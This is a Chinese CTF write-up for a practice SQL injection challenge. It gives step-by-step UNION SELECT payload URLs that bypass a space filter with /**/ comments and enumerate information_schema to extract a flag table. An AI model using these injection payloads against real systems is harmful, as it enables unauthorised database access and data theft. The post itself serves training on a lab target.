2. 程式人生 > >CFT每日一題之簡單的SQL注入之二

CFT每日一題之簡單的SQL注入之二

阿新 發佈:2018-11-08

首先,輸入1 嘗試一下


然後爆出ID 加 個 單引號 嘗試 ,出現報錯介面

然後 大概猜測程式碼是  select xx from XX where id=''

用and測試

發現了有過濾,經過多測實驗後,發現去掉空格就可以


然後開始構造,我們可以使用/**/來代替空格

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/%271%27=%271

然後就可以一層一層往下查了

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/%271%27=%271


然後查詢列,獲得flag列

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/%271%27=%271


最後查詢flag列的資料

http://ctf5.shiyanbar.com/web/index_2.php?id=-11%27/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/%271%27=%271


相關推薦

CFT每日簡單SQL注入

首先,輸入1 嘗試一下 然後爆出ID 加 個 單引號 嘗試 ,出現報錯介面 然後 大概猜測程式碼是  select xx from XX where id='' 用and測試 發現了有過濾,經過多測實驗後,發現去掉空格就可以 然後開始構造,我們可以使用/**/

CFT每日 天下武功,唯快不破

首先,進入題目頁面,大意就是說,你必須足夠快(二十年沒白擼的那種) 一開始以為是頁面重定向,然後抓包    欸,在響應包裡發現了什麼 FLAG ,沒錯,就是FLAG,這還不是美滋滋,複製提交 。哎,臥槽,不對,肯定是網路問題,再提交,還不對,思考三秒,哦,知道了,肯定

【Big Data 每日20180927】Structured Streaming Event Time 解析

Structured Streaming 之 Event Time 解析 [酷玩 Spark] Structured Streaming 原始碼解析系列 ,返回目錄請 猛戳這裡 本文內容適用範圍: * 2017.07.11 update, Spark 2.2 全系列

【Big Data 每日20180926】Structured Streaming 狀態儲存解析

Structured Streaming 之狀態儲存解析 [酷玩 Spark] Structured Streaming 原始碼解析系列 ,返回目錄請 猛戳這裡 本文內容適用範圍: * 2017.07.11 update, Spark 2.2 全系列 √ (已釋出:2

每日 hiho228周 Parentheses Matching (簡單

描述 Given a string of balanced parentheses output all the matching pairs. 輸入 A string consisting of only parentheses ‘(’ and ‘)’. The parenthes

每日LeetCode 棧簡單集合496,682,232,225,155,844,20

496 下一個最大的元素方法1 :自己瞎寫的 沒有考慮到棧的特性class Solution:def nextGreaterElement(self, nums1, nums2): L=[] for i in nums1: k=nums2.index(i)

每日 hiho228周 Parentheses Matching (簡單

描述 Given a string of balanced parentheses output all the matching pairs. 輸入 A string consisting of on

老男孩教育每日-2017年5月24日-腦洞神探tmp目錄的下的備份文件突然沒了,誰來背鍋?

tmp目錄 每日一題 1.題目老男孩教育每日一題-2017年5月24日-腦洞神探之tmp目錄的下的備份文件突然沒了,誰來背鍋?2.參考答案1.運維幹的2.開發幹的3.系統幹的,系統安裝了一個命令tmpwatch,定期刪除文件。在Centos/RHEL/Fedora系統下存在清理機制(Ubuntu下沒有

<每日>題目1:簡單的註冊和登錄1.0

要去 換行符 去掉 utf-8 orm clas class app 成功 #版本1.0,最基本的註冊登錄‘‘‘1.註冊,將賬號和密碼分別寫在不同的文檔裏面2.登錄,分別從賬戶文檔和密碼文檔進行讀取並登錄‘‘‘ 1 #註冊 2 Identity = input("請輸入您

每日LeetCode移除元素 刪除有序陣列重複元素

這兩道題若是不使用官方題解的雙指標做法,就會涉及到淺複製,深複製的問題,可參考如下https://blog.csdn.net/qq_32907349/article/details/52190796 。其中,此題將要使用深複製,但這會違背題意中的不開闢新的記憶體空間。 1.移除元素class Soluti

每日LeetCode移除元素 刪除有序數組重復元素

== 復制 題解 每日一題 for 元素 etc 輸出 detail 這兩道題若是不使用官方題解的雙指針做法,就會涉及到淺復制,深復制的問題,可參考如下https://blog.csdn.net/qq_32907349/article/details/52190796 。

每日 LeetCode實現strstr()

自己寫的一個一個字元匹配的while迴圈是什麼辣雞玩意,根本就過不了一些特殊測試集,哎,看官解吧。class Solution:def strStr(self, haystack, needle):""":type haystack: str:type needle: str:rtype: int"""if

CTF每日求素數

 大概翻譯一下就是說,求一百萬以後的兩個素數,素數本身的位數加起來也得是素數 就是 23 是個宿舍 2+3 為5 5也是素數,這樣 ok,1百萬以後,這種題,默默的開啟QT ,想了一下還是關了,默默的開啟pycharm 。 程式碼貼上: from math import

CTF每日檢視原始碼

哎,也不管簡單還是困難了,反正從裡面隨機點一個題吧,反正我英文也不好,也不認識題目 233333 看了一下題目,嗯,讓從原始碼裡找東西 一開始以為是一個存在於另一個網頁裡,在原始碼裡翻了很久,除了幾個指向github的連結,沒有什麼收穫,嗯,我翻,我在翻,好吧,還是沒有,然後重新回到題

CTF每日robots訪問

剛開始只是給了這麼一個提示  看的我一臉矇蔽,怎麼沒有提交的地方,不用提交flag,說是訪問robots.txt,也沒說訪問哪個網站的,嗯,先看看原始碼,沒啥發現,想想可能是我想太多了,我先進一下本網站的robots看一下好了 嗯,給了一個連結,不管了,先訪問一下

CTF每日ACII碼編碼

好久沒寫了。。。因為好久沒做題了,最近又開始偷懶了,愁人。今天發現了一個新的CTF平臺,很有意思,不過缺點是沒有中文,不過這沒有關係,誰叫我谷歌翻譯用的賊6,今天是個簽到題,就不多說了。 題目連結:http://www.wechall.net/en/challenge/training/enco

劍值offer66每日——第九

題目描述:          變態跳臺階:一隻青蛙一次可以跳上1級臺階,也可以跳上2級……它也可以跳上n級。求該青蛙跳上一個n級的臺階總共有多少種跳法。 思路:本題前提一次可跳1~n階臺階,設F(n)為一次可跳1~n階臺階時n階臺階的跳法數,

劍值offer66每日——第八

題目描述:          一隻青蛙一次可以跳上1級臺階,也可以跳上2級。求該青蛙跳上一個n級的臺階總共有多少種跳法(先後次序不同算不同的結果)。 思路:本題只有一階和二階跳法,設n個臺階的跳法為F(n),採用類斐波拉契數列遞迴演算法

劍值offer66每日——第七

題目描述:          大家都知道斐波那契數列,現在要求輸入一個整數n,請你輸出斐波那契數列的第n項(從0開始,第0項為0)。 n<=39 思路:簡單   程式碼實現: int Fibonacci(int

劍值offer66每日——第五

題目描述:          用兩個棧來實現一個佇列,完成佇列的Push和Pop操作。 佇列中的元素為int型別。 思路:簡單 程式碼實現: class Solution { public: void push(int nod